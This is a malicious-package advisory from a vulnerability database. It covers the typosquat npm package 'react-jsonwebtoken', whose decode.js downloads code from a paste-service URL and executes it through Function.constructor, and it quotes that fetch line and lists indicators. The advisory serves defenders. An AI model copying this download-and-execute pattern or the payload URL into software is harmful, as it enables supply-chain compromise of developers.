VDB

GCVE-110-OSM-2026-7083

GCVE-110-OSM-2026-7083
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published July 1, 2026
This package is a typosquat of the legitimate 'jsonwebtoken' library (authored under 'auth0') but published by a brand-new single-package account 'polaris202607' pointing to an unrelated repository (radix-ui/primitives). The core attack is in decode.js, which fetches a remote payload from the paste/staging service jsonkeeper.com and executes it via Function.constructor() — a classic download-and-execute pattern. The combination of remote code execution from an untrusted paste service, dynamic code execution via Function constructor, and the clear typosquatting identity makes this unambiguously malicious. The attacker model is a supply chain attack targeting developers who mistype 'jsonwebtoken' as 'react-jsonwebtoken'. ENTRY index.js (main: index.js) EXFIL - Fetch and Eval/Exec in decode.js: "axios.get("https://jsonkeeper.com/b/E69V3"); const createHandler = (errCode) => ..." - Payload Download from Paste Service in decode.js: "jsonkeeper.com" - Network Request in decode.js: "axios.get(" ADDITIONAL FINDINGS - Dynamic Code Execution in decode.js: "Function.constructor(" - Brand New Package - Malicious Dependency Detected in package.json PAYLOAD FILES decode.js INDICATORS (IOCs) - domains: openid.net - payloadFileHash: 58ff55bc86bc3c045aaf4dcf1ed7d12dd6f3e38763a9a8dfdc8ac74ab1cf01c0

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownreact-jsonwebtokenall (affected)

References

vendor

Browse GCVE Records

72,337 records in the GCVE database · Updated July 14, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›